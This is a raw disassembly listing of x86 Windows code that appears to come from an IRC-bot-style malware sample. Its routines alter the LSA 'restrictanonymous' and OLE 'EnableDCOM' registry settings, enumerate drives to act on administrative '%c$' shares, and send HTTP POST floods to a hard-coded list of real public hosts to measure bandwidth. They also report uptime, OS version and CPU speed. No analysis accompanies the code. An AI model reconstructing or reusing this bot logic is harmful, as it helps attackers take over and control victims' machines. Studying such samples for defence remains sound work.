jmp short loc_419EEC
; ---------------------------------------------------------------------------
loc_419EE7: ; CODE XREF: sub_419E7A+64�j
push offset dword_43A318
loc_419EEC: ; CODE XREF: sub_419E7A+6B�j
lea eax, [ebp+var_214]
push eax
call sub_41B886
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4CB630 ; RegCloseKey
jmp short loc_419F18
; ---------------------------------------------------------------------------
loc_419F05: ; CODE XREF: sub_419E7A+36�j
lea eax, [ebp+var_214]
push offset dword_43A2E8
push eax
call sub_41B886
pop ecx
pop ecx
loc_419F18: ; CODE XREF: sub_419E7A+89�j
cmp [ebp+arg_C], edi
jnz short loc_419F37
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_419F37: ; CODE XREF: sub_419E7A+A1�j
lea eax, [ebp+var_214]
push eax
call sub_4151AD
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_4CB6C4 ; RegOpenKeyExA
test eax, eax
jnz short loc_419FA5
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call ds:dword_4CB678 ; RegSetValueExA
test eax, eax
jz short loc_419F87
push offset dword_43A298
jmp short loc_419F8C
; ---------------------------------------------------------------------------
loc_419F87: ; CODE XREF: sub_419E7A+104�j
push offset dword_43A264
loc_419F8C: ; CODE XREF: sub_419E7A+10B�j
lea eax, [ebp+var_214]
push eax
call sub_41B886
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4CB630 ; RegCloseKey
jmp short loc_419FBF
; ---------------------------------------------------------------------------
loc_419FA5: ; CODE XREF: sub_419E7A+E2�j
push offset dword_43A228
jmp short loc_419FB1
; ---------------------------------------------------------------------------
loc_419FAC: ; CODE XREF: sub_419E7A+13�j
push offset dword_43A1F8
loc_419FB1: ; CODE XREF: sub_419E7A+130�j
lea eax, [ebp+var_214]
push eax
call sub_41B886
pop ecx
pop ecx
loc_419FBF: ; CODE XREF: sub_419E7A+129�j
cmp [ebp+arg_C], edi
jnz short loc_419FDE
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_419FDE: ; CODE XREF: sub_419E7A+148�j
lea eax, [ebp+var_214]
push eax
call sub_4151AD
cmp ds:dword_4CB74C, edi
pop ecx
jnz loc_41A159
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41A001: ; CODE XREF: sub_419E7A+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call ds:dword_4CB598
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41A09E
cmp eax, 0EAh
jz short loc_41A09E
mov esi, offset off_43A0C0
loc_41A032: ; CODE XREF: sub_419E7A+21D�j
push dword ptr [esi]
push edi
call sub_418C6C
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_41A049
push offset dword_43A1D4
jmp short loc_41A04E
; ---------------------------------------------------------------------------
loc_41A049: ; CODE XREF: sub_419E7A+1C6�j
push offset dword_43A1A8
loc_41A04E: ; CODE XREF: sub_419E7A+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41B980
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41A081
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A081: ; CODE XREF: sub_419E7A+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_4151AD
add esi, 8
pop ecx
cmp esi, offset dword_43A0E0
jb short loc_41A032
jmp loc_41A136
; ---------------------------------------------------------------------------
loc_41A09E: ; CODE XREF: sub_419E7A+1AA�j
; sub_419E7A+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_41A12D
loc_41A0AD: ; CODE XREF: sub_419E7A+2AF�j
mov edi, [esi]
push edi
call sub_41D817
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41A122
push edi
call sub_418B59
push eax
push 0
call sub_418C6C
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41A0DC
push offset dword_43A184
jmp short loc_41A0E1
; ---------------------------------------------------------------------------
loc_41A0DC: ; CODE XREF: sub_419E7A+259�j
push offset dword_43A158
loc_41A0E1: ; CODE XREF: sub_419E7A+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41B980
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41A115
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A115: ; CODE XREF: sub_419E7A+27F�j
lea eax, [ebp+var_214]
push eax
call sub_4151AD
pop ecx
loc_41A122: ; CODE XREF: sub_419E7A+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41A0AD
xor edi, edi
loc_41A12D: ; CODE XREF: sub_419E7A+22D�j
push [ebp+var_8]
call ds:dword_4CB6E4
loc_41A136: ; CODE XREF: sub_419E7A+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41A001
lea eax, [ebp+var_214]
push offset dword_43A130
push eax
call sub_41B886
pop ecx
pop ecx
pop ebx
jmp short loc_41A16C
; ---------------------------------------------------------------------------
loc_41A159: ; CODE XREF: sub_419E7A+177�j
lea eax, [ebp+var_214]
push offset dword_43A100
push eax
call sub_41B886
pop ecx
pop ecx
loc_41A16C: ; CODE XREF: sub_419E7A+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_41A18A
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A18A: ; CODE XREF: sub_419E7A+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_4151AD
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_419E7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A19E proc near ; CODE XREF: sub_419E1A:loc_419E61�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp ds:dword_4CB724, ebx
push esi
jnz loc_41A2CC
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_4CB6C4 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A229
mov ax, word_438E5C
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_4CB678 ; RegSetValueExA
test eax, eax
jz short loc_41A20B
push offset dword_43A4B0
jmp short loc_41A210
; ---------------------------------------------------------------------------
loc_41A20B: ; CODE XREF: sub_41A19E+64�j
push offset dword_43A494
loc_41A210: ; CODE XREF: sub_41A19E+6B�j
lea eax, [ebp+var_220]
push eax
call sub_41B886
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4CB630 ; RegCloseKey
jmp short loc_41A23C
; ---------------------------------------------------------------------------
loc_41A229: ; CODE XREF: sub_41A19E+36�j
lea eax, [ebp+var_220]
push offset dword_43A2E8
push eax
call sub_41B886
pop ecx
pop ecx
loc_41A23C: ; CODE XREF: sub_41A19E+89�j
cmp [ebp+arg_C], ebx
jnz short loc_41A25B
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A25B: ; CODE XREF: sub_41A19E+A1�j
lea eax, [ebp+var_220]
push eax
call sub_4151AD
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_4CB6C4 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A2C5
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call ds:dword_4CB678 ; RegSetValueExA
test eax, eax
jz short loc_41A2A7
push offset dword_43A454
jmp short loc_41A2AC
; ---------------------------------------------------------------------------
loc_41A2A7: ; CODE XREF: sub_41A19E+100�j
push offset dword_43A41C
loc_41A2AC: ; CODE XREF: sub_41A19E+107�j
lea eax, [ebp+var_220]
push eax
call sub_41B886
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_4CB630 ; RegCloseKey
jmp short loc_41A2DF
; ---------------------------------------------------------------------------
loc_41A2C5: ; CODE XREF: sub_41A19E+E2�j
push offset dword_43A3E0
jmp short loc_41A2D1
; ---------------------------------------------------------------------------
loc_41A2CC: ; CODE XREF: sub_41A19E+13�j
push offset dword_43A1F8
loc_41A2D1: ; CODE XREF: sub_41A19E+12C�j
lea eax, [ebp+var_220]
push eax
call sub_41B886
pop ecx
pop ecx
loc_41A2DF: ; CODE XREF: sub_41A19E+125�j
cmp [ebp+arg_C], ebx
jnz short loc_41A2FE
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A2FE: ; CODE XREF: sub_41A19E+144�j
lea eax, [ebp+var_220]
push eax
call sub_4151AD
cmp ds:dword_4CB74C, ebx
pop ecx
jnz loc_41A473
push edi
mov esi, offset off_43A0C0
mov edi, 200h
loc_41A322: ; CODE XREF: sub_41A19E+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_418BC0
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41A33D
push offset dword_43A3C0
jmp short loc_41A342
; ---------------------------------------------------------------------------
loc_41A33D: ; CODE XREF: sub_41A19E+196�j
push offset dword_43A398
loc_41A342: ; CODE XREF: sub_41A19E+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41B980
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41A371
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A371: ; CODE XREF: sub_41A19E+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_4151AD
add esi, 8
pop ecx
cmp esi, offset off_43A0D0
jb short loc_41A322
call dword_427190 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_41A45B
loc_41A39C: ; CODE XREF: sub_41A19E+2B7�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_41A450
cmp bl, 41h
jz loc_41A450
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_0 ; "%c:\\"
push 0Ah
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_20]
push eax
call ds:dword_4CB6B4 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41A450
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_418BC0
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41A40E
push offset dword_43A3C0
jmp short loc_41A413
; ---------------------------------------------------------------------------
loc_41A40E: ; CODE XREF: sub_41A19E+267�j
push offset dword_43A398
loc_41A413: ; CODE XREF: sub_41A19E+26E�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41B980
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41A443
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A443: ; CODE XREF: sub_41A19E+289�j
lea eax, [ebp+var_220]
push eax
call sub_4151AD
pop ecx
loc_41A450: ; CODE XREF: sub_41A19E+206�j
; sub_41A19E+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_41A39C
loc_41A45B: ; CODE XREF: sub_41A19E+1F8�j
lea eax, [ebp+var_220]
push offset dword_43A368
push eax
call sub_41B886
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A473: ; CODE XREF: sub_41A19E+173�j
lea eax, [ebp+var_220]
push offset dword_43A100
push eax
call sub_41B886
pop ecx
pop ecx
loc_41A486: ; CODE XREF: sub_41A19E+2D3�j
cmp [ebp+arg_C], ebx
jnz short loc_41A4A4
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_41A4A4: ; CODE XREF: sub_41A19E+2EB�j
lea eax, [ebp+var_220]
push eax
call sub_4151AD
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_41A19E endp
; =============== S U B R O U T I N E =======================================
sub_41A4B8 proc near ; CODE XREF: sub_41A6AF+CB�p
; sub_41A6AF+DD�p ...
arg_0 = dword ptr 4
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41A4B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A4D2 proc near ; CODE XREF: sub_41A6AF+D4�p
; sub_41A6AF+E6�p ...
var_38 = dword ptr -38h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41AFE0
mov esi, 0FFh
pop ecx
cmp eax, esi
ja loc_41A6AB
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_41B590
push [ebp+arg_0]
mov [ebp+var_28], 2
call sub_40AAFA
add esp, 10h
mov [ebp+var_24], eax
test eax, eax
jz loc_41A6AB
push 50h
call ds:dword_4CB654 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call ds:dword_4CB6D4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41A6AB
lea ecx, [ebp+var_28]
push 10h
push ecx
push eax
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_41A6AB
push 32003h
call sub_41CFC5
mov edi, dword_4270A8
mov ebx, eax
pop ecx
mov [ebp+var_8], ebx
call edi ; GetTickCount
push eax
call sub_41B8D8
call sub_41B8E2
cdq
idiv esi
mov [esp+38h+var_38], 32001h
push 0
push ebx
movsx esi, dl
call sub_41B590
push 32000h
push esi
push ebx
call sub_41B590
push ebx
call sub_41AFE0
push 323EAh
mov ebx, eax
call sub_41CFC5
add esp, 20h
mov esi, eax
push ebx
push [ebp+arg_0]
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi
call sub_41B886
push [ebp+var_8]
push esi
call sub_41BEC0
push offset asc_433F14 ; "\r\n"
push esi
call sub_41BEC0
push esi
call sub_41AFE0
mov ebx, eax
add esp, 24h
mov [ebp+var_10], ebx
call edi ; GetTickCount
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test ebx, ebx
mov [ebp+arg_0], eax
jbe short loc_41A62B
mov [ebp+var_C], ebx
mov ebx, 400h
jmp short loc_41A5FB
; ---------------------------------------------------------------------------
loc_41A5F8: ; CODE XREF: sub_41A4D2+157�j
mov eax, [ebp+arg_0]
loc_41A5FB: ; CODE XREF: sub_41A4D2+124�j
mov ecx, [ebp+var_10]
push 0
sub ecx, eax
cmp ecx, ebx
jnb short loc_41A60B
push [ebp+var_C]
jmp short loc_41A60C
; ---------------------------------------------------------------------------
loc_41A60B: ; CODE XREF: sub_41A4D2+132�j
push ebx
loc_41A60C: ; CODE XREF: sub_41A4D2+137�j
add eax, esi
push eax
push [ebp+var_4]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41A692
add [ebp+arg_0], ebx
sub [ebp+var_C], ebx
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_10]
jb short loc_41A5F8
loc_41A62B: ; CODE XREF: sub_41A4D2+11A�j
call edi ; GetTickCount
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul flt_42770C
fst [ebp+arg_0]
fcomp flt_427708
fnstsw ax
sahf
jnz short loc_41A653
fld1
fstp [ebp+arg_0]
loc_41A653: ; CODE XREF: sub_41A4D2+17A�j
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_8]
call sub_41B0B1
push esi
call sub_41B0B1
mov eax, [ebp+var_10]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+arg_0]
fmul flt_427704
fmul flt_427700
call sub_41C798
loc_41A68D: ; CODE XREF: sub_41A4D2+1DB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A692: ; CODE XREF: sub_41A4D2+149�j
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_8]
call sub_41B0B1
push esi
call sub_41B0B1
pop ecx
pop ecx
loc_41A6AB: ; CODE XREF: sub_41A4D2+19�j
; sub_41A4D2+42�j ...
xor eax, eax
jmp short loc_41A68D
sub_41A4D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6AF proc near ; CODE XREF: sub_401ACD+2E62�p
var_26C = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41A4B8
push [ebp+eax*4+var_3C]
call sub_41A4D2
push 8
mov esi, eax
call sub_41A4B8
push [ebp+eax*4+var_3C]
call sub_41A4D2
add esp, 10h
test esi, esi
jz short loc_41A7B0
test eax, eax
jz short loc_41A7AC
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41A7B2
; ---------------------------------------------------------------------------
loc_41A7AC: ; CODE XREF: sub_41A6AF+F4�j
mov ebx, esi
jmp short loc_41A7B2
; ---------------------------------------------------------------------------
loc_41A7B0: ; CODE XREF: sub_41A6AF+F0�j
mov ebx, eax
loc_41A7B2: ; CODE XREF: sub_41A6AF+FB�j
; sub_41A6AF+FF�j
push 0Ch
call sub_41A4B8
push [ebp+eax*4+var_6C]
call sub_41A4D2
push 0Ch
mov edi, eax
call sub_41A4B8
push [ebp+eax*4+var_6C]
call sub_41A4D2
add esp, 10h
test edi, edi
jz short loc_41A7EA
test eax, eax
jz short loc_41A7E6
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41A7EC
; ---------------------------------------------------------------------------
loc_41A7E6: ; CODE XREF: sub_41A6AF+12E�j
mov esi, edi
jmp short loc_41A7EC
; ---------------------------------------------------------------------------
loc_41A7EA: ; CODE XREF: sub_41A6AF+12A�j
mov esi, eax
loc_41A7EC: ; CODE XREF: sub_41A6AF+135�j
; sub_41A6AF+139�j
push 6
call sub_41A4B8
push [ebp+eax*4+var_1C]
call sub_41A4D2
push 6
mov edi, eax
call sub_41A4B8
push [ebp+eax*4+var_1C]
call sub_41A4D2
add esp, 10h
test edi, edi
jz short loc_41A824
test eax, eax
jz short loc_41A820
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41A826
; ---------------------------------------------------------------------------
loc_41A820: ; CODE XREF: sub_41A6AF+168�j
mov ecx, edi
jmp short loc_41A826
; ---------------------------------------------------------------------------
loc_41A824: ; CODE XREF: sub_41A6AF+164�j
mov ecx, eax
loc_41A826: ; CODE XREF: sub_41A6AF+16F�j
; sub_41A6AF+173�j
xor eax, eax
test ebx, ebx
jz short loc_41A833
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41A836
; ---------------------------------------------------------------------------
loc_41A833: ; CODE XREF: sub_41A6AF+17B�j
push 2
pop edi
loc_41A836: ; CODE XREF: sub_41A6AF+182�j
test esi, esi
jz short loc_41A83E
add eax, esi
jmp short loc_41A83F
; ---------------------------------------------------------------------------
loc_41A83E: ; CODE XREF: sub_41A6AF+189�j
dec edi
loc_41A83F: ; CODE XREF: sub_41A6AF+18D�j
test ecx, ecx
jz short loc_41A847
add eax, ecx
jmp short loc_41A848
; ---------------------------------------------------------------------------
loc_41A847: ; CODE XREF: sub_41A6AF+192�j
dec edi
loc_41A848: ; CODE XREF: sub_41A6AF+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+var_26C]
push offset dword_43A508
push eax
call sub_41B886
push 0
lea eax, [ebp+var_26C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_26C]
push eax
call sub_4151AD
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41A6AF endp
; =============== S U B R O U T I N E =======================================
sub_41A88C proc near ; CODE XREF: sub_401ACD+25A1�p
; sub_401ACD+2A11�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call dword_4270A8 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_4DB920
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
push esi
call sub_41B980
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41A88C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8F5 proc near ; CODE XREF: sub_416F1B+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call dword_4270C8 ; GetVersionExA
test eax, eax
jz short loc_41A988
cmp [ebp+var_90], 4
jnz short loc_41A95E
cmp [ebp+var_8C], esi
jnz short loc_41A946
cmp [ebp+var_84], 1
jnz short loc_41A939
push 1
pop esi
loc_41A939: ; CODE XREF: sub_41A8F5+3F�j
cmp [ebp+var_84], 2
jnz short loc_41A988
push 1
jmp short loc_41A987
; ---------------------------------------------------------------------------
loc_41A946: ; CODE XREF: sub_41A8F5+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41A953
loc_41A94F: ; CODE XREF: sub_41A8F5+78�j
push 2
jmp short loc_41A987
; ---------------------------------------------------------------------------
loc_41A953: ; CODE XREF: sub_41A8F5+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_41A988
jmp short loc_41A978
; ---------------------------------------------------------------------------
loc_41A95E: ; CODE XREF: sub_41A8F5+2E�j
cmp [ebp+var_90], 5
jnz short loc_41A988
cmp [ebp+var_8C], esi
jz short loc_41A94F
cmp [ebp+var_8C], 1
jnz short loc_41A97C
loc_41A978: ; CODE XREF: sub_41A8F5+67�j
push 3
jmp short loc_41A987
; ---------------------------------------------------------------------------
loc_41A97C: ; CODE XREF: sub_41A8F5+81�j
cmp [ebp+var_8C], 2
jnz short loc_41A988
push 7
loc_41A987: ; CODE XREF: sub_41A8F5+4F�j
; sub_41A8F5+5C�j ...
pop esi
loc_41A988: ; CODE XREF: sub_41A8F5+25�j
; sub_41A8F5+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_41A8F5 endp
; =============== S U B R O U T I N E =======================================
sub_41A98D proc near ; CODE XREF: sub_41AA43+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41A995: ; CODE XREF: sub_41A98D+2F�j
; sub_41A98D+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call dword_427078 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_41D410
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41A995
jb short loc_41A9C4
cmp ebx, esi
ja short loc_41A995
loc_41A9C4: ; CODE XREF: sub_41A98D+31�j
push 0
push 64h
push edi
push ebx
call sub_41D480
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_41AA37
jb short loc_41A9E3
cmp esi, 50h
jnb short loc_41A9E8
loc_41A9E3: ; CODE XREF: sub_41A98D+4F�j
push 4Bh
xor edx, edx
pop eax
loc_41A9E8: ; CODE XREF: sub_41A98D+54�j
test ecx, ecx
ja short loc_41AA37
jb short loc_41A9F3
cmp esi, 47h
jnb short loc_41A9F8
loc_41A9F3: ; CODE XREF: sub_41A98D+5F�j
push 42h
xor edx, edx
pop eax
loc_41A9F8: ; CODE XREF: sub_41A98D+64�j
test ecx, ecx
ja short loc_41AA37
jb short loc_41AA03
cmp esi, 37h
jnb short loc_41AA08
loc_41AA03: ; CODE XREF: sub_41A98D+6F�j
push 32h
xor edx, edx
pop eax
loc_41AA08: ; CODE XREF: sub_41A98D+74�j
test ecx, ecx
ja short loc_41AA37
jb short loc_41AA13
cmp esi, 26h
jnb short loc_41AA18
loc_41AA13: ; CODE XREF: sub_41A98D+7F�j
push 21h
xor edx, edx
pop eax
loc_41AA18: ; CODE XREF: sub_41A98D+84�j
test ecx, ecx
ja short loc_41AA37
jb short loc_41AA23
cmp esi, 1Eh
jnb short loc_41AA28
loc_41AA23: ; CODE XREF: sub_41A98D+8F�j
push 19h
xor edx, edx
pop eax
loc_41AA28: ; CODE XREF: sub_41A98D+94�j
test ecx, ecx
ja short loc_41AA37
jb short loc_41AA33
cmp esi, 0Ah
jnb short loc_41AA37
loc_41AA33: ; CODE XREF: sub_41A98D+9F�j
xor eax, eax
xor edx, edx
loc_41AA37: ; CODE XREF: sub_41A98D+4D�j
; sub_41A98D+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
